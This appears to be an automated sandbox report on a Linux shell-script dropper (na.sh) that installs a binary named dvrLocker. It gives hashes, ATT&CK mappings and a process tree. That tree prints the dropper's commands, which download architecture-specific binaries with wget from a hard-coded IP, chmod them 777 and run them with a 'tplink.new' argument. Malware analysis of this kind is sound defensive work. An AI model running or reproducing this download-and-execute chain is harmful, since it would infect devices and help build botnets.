89e3309d765c4f00090a446b6599b23a3d2334aec380f52cb7d9c89da2683e6f

Analysis

max time kernel
149s
max time network
133s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
10-10-2024 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

na.sh
Size

372B
MD5

6b2644c0adca68c54a53a79842eb3b3c
SHA1

d26ec0f0fc70fcb713aba5fa56912809cefb8bc0
SHA256

89e3309d765c4f00090a446b6599b23a3d2334aec380f52cb7d9c89da2683e6f
SHA512

943667c0ddec5ed4ec3a8d66d8997078a9b04f3b48b937f5e3b339f039d53c495a27a3253c504edc22704c394bb197455ace2e1c45e17eeda806b3b4200fb90c

Score

7^/10

credential_access defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 5 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1511	chmod
1518	chmod
1522	chmod
1526	chmod
1530	chmod

Deletes itself 1 IoCs

pid	Process
1531	dvrLocker

Executes dropped EXE 5 IoCs

ioc	pid	Process
/dvrLocker	1512	dvrLocker
/dvrLocker	1519	dvrLocker
/dvrLocker	1523	dvrLocker
/dvrLocker	1527	dvrLocker
/dvrLocker	1531	dvrLocker

Enumerates running processes
Discovers information about currently running processes on the system

Reads process memory 1 TTPs 4 IoCs

Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

credential_access

Proc Filesystem

T1003.007

description	ioc	Process
File opened for reading	/proc/479/maps	dvrLocker
File opened for reading	/proc/679/maps	dvrLocker
File opened for reading	/proc/683/maps	dvrLocker
File opened for reading	/proc/708/maps	dvrLocker

Changes its process name 1 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	1531	dvrLocker

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1502/cmdline	dvrLocker
File opened for reading	/proc/1515/cmdline	dvrLocker
File opened for reading	/proc/16/cmdline	dvrLocker
File opened for reading	/proc/1138/cmdline	dvrLocker
File opened for reading	/proc/1532/cmdline	dvrLocker
File opened for reading	/proc/15/cmdline	dvrLocker
File opened for reading	/proc/650/cmdline	dvrLocker
File opened for reading	/proc/3/cmdline	dvrLocker
File opened for reading	/proc/6/cmdline	dvrLocker
File opened for reading	/proc/12/cmdline	dvrLocker
File opened for reading	/proc/526/cmdline	dvrLocker
File opened for reading	/proc/557/cmdline	dvrLocker
File opened for reading	/proc/1036/cmdline	dvrLocker
File opened for reading	/proc/1086/cmdline	dvrLocker
File opened for reading	/proc/1258/cmdline	dvrLocker
File opened for reading	/proc/1533/cmdline	dvrLocker
File opened for reading	/proc/17/cmdline	dvrLocker
File opened for reading	/proc/84/cmdline	dvrLocker
File opened for reading	/proc/115/cmdline	dvrLocker
File opened for reading	/proc/676/cmdline	dvrLocker
File opened for reading	/proc/1290/cmdline	dvrLocker
File opened for reading	/proc/1477/cmdline	dvrLocker
File opened for reading	/proc/21/cmdline	dvrLocker
File opened for reading	/proc/203/cmdline	dvrLocker
File opened for reading	/proc/1121/cmdline	dvrLocker
File opened for reading	/proc/1317/cmdline	dvrLocker
File opened for reading	/proc/1352/cmdline	dvrLocker
File opened for reading	/proc/137/cmdline	dvrLocker
File opened for reading	/proc/785/cmdline	dvrLocker
File opened for reading	/proc/997/cmdline	dvrLocker
File opened for reading	/proc/1379/cmdline	dvrLocker
File opened for reading	/proc/28/cmdline	dvrLocker
File opened for reading	/proc/82/cmdline	dvrLocker
File opened for reading	/proc/484/cmdline	dvrLocker
File opened for reading	/proc/1049/cmdline	dvrLocker
File opened for reading	/proc/19/cmdline	dvrLocker
File opened for reading	/proc/20/cmdline	dvrLocker
File opened for reading	/proc/177/cmdline	dvrLocker
File opened for reading	/proc/26/cmdline	dvrLocker
File opened for reading	/proc/79/cmdline	dvrLocker
File opened for reading	/proc/175/cmdline	dvrLocker
File opened for reading	/proc/1011/cmdline	dvrLocker
File opened for reading	/proc/1175/cmdline	dvrLocker
File opened for reading	/proc/1240/cmdline	dvrLocker
File opened for reading	/proc/166/cmdline	dvrLocker
File opened for reading	/proc/663/cmdline	dvrLocker
File opened for reading	/proc/1053/cmdline	dvrLocker
File opened for reading	/proc/1056/cmdline	dvrLocker
File opened for reading	/proc/1135/cmdline	dvrLocker
File opened for reading	/proc/1503/cmdline	dvrLocker
File opened for reading	/proc/10/cmdline	dvrLocker
File opened for reading	/proc/78/cmdline	dvrLocker
File opened for reading	/proc/85/cmdline	dvrLocker
File opened for reading	/proc/89/cmdline	dvrLocker
File opened for reading	/proc/1272/cmdline	dvrLocker
File opened for reading	/proc/1176/cmdline	dvrLocker
File opened for reading	/proc/1177/cmdline	dvrLocker
File opened for reading	/proc/31/cmdline	dvrLocker
File opened for reading	/proc/164/cmdline	dvrLocker
File opened for reading	/proc/414/cmdline	dvrLocker
File opened for reading	/proc/1130/cmdline	dvrLocker
File opened for reading	/proc/1142/cmdline	dvrLocker
File opened for reading	/proc/1156/cmdline	dvrLocker
File opened for reading	/proc/1327/cmdline	dvrLocker

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1514	wget

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/0	na.sh

/tmp/na.sh
/tmp/na.sh
1⤵
- Writes file to tmp directory
PID:1508
- /bin/rm
  rm -rf dvrLocker
  2⤵
  PID:1509
- /usr/bin/wget
  wget http://185.157.247.125/c/empsl -O -
  2⤵
  PID:1510
- /bin/chmod
  chmod 777 dvrLocker
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /dvrLocker
  ./dvrLocker tplink.new
  2⤵
  - Executes dropped EXE
  PID:1512
- /usr/bin/wget
  wget http://185.157.247.125/c/emips -O -
  2⤵
  - System Network Configuration Discovery
  PID:1514
- /bin/chmod
  chmod 777 dvrLocker
  2⤵
  - File and Directory Permissions Modification
  PID:1518
- /dvrLocker
  ./dvrLocker tplink.new
  2⤵
  - Executes dropped EXE
  PID:1519
- /usr/bin/wget
  wget http://185.157.247.125/c/earm -O -
  2⤵
  PID:1521
- /bin/chmod
  chmod 777 dvrLocker
  2⤵
  - File and Directory Permissions Modification
  PID:1522
- /dvrLocker
  ./dvrLocker tplink.new
  2⤵
  - Executes dropped EXE
  PID:1523
- /usr/bin/wget
  wget http://185.157.247.125/c/earm7 -O -
  2⤵
  PID:1525
- /bin/chmod
  chmod 777 dvrLocker
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /dvrLocker
  ./dvrLocker tplink.new
  2⤵
  - Executes dropped EXE
  PID:1527
- /usr/bin/wget
  wget http://185.157.247.125/c/ex86 -O -
  2⤵
  PID:1529
- /bin/chmod
  chmod 777 dvrLocker
  2⤵
  - File and Directory Permissions Modification
  PID:1530
- /dvrLocker
  ./dvrLocker tplink.new
  2⤵
  - Deletes itself
  - Executes dropped EXE
  - Reads process memory
  - Changes its process name
  - Reads runtime system information
  PID:1531

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

OS Credential Dumping

T1003

Proc Filesystem

T1003.007

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/dvrLocker

Filesize
27KB

MD5
300cd530fb0a7f7cf6db875f68c0483e

SHA1
a4bce294dc142fb1354e917bed4d58c98f381850

SHA256
a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885

SHA512
656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1

Download Submit
/dvrLocker

Filesize
53KB

MD5
521069251bdce0fbd37497b8f527ab23

SHA1
020730190edde76dec3de9678351aa6e65ab91bf

SHA256
aa5db395352aff621bc290b0eb2f7715230f93556ac99cc056cd22a56a5adc72

SHA512
09e176cdbcb48370c273ea4733d1c0c8f64625f2070ab7742b929268d5cb6bd97d091c884223777ccd0877209d65db1c8d56adaf3063d7fcfc9f44e127649f70

Download Submit
/dvrLocker

Filesize
29KB

MD5
dba2d4fa85301b473ce27c4f2e2a0297

SHA1
30ec57316ef1bbe5840d997082a0b01003bf365f

SHA256
b07efeec1020b016192a2c53567fa55e056f3219b0f77edef00ca60e50ecb797

SHA512
b8fcabe3733b4d4d55b056d1cca76014839b3728b197aca440af4118e87602e3a6612ae4f24dd0c21fc43121dbe33cc798c3ad9006a4379dad250e4a2f5adc53

Download Submit
/dvrLocker

Filesize
41KB

MD5
3cfc76868e26201ac03e0583b7c8aaba

SHA1
03436d9d090e1f944fecf60adc1e45f90df20c26

SHA256
8c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d

SHA512
84add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2

Download Submit
/dvrLocker

Filesize
40KB

MD5
c0b34d8a59f793b636b5424b8e96a64a

SHA1
d5eac6c7b3a5953ffcd642de9db2cd1c45463e96

SHA256
defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270

SHA512
57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4

Download Submit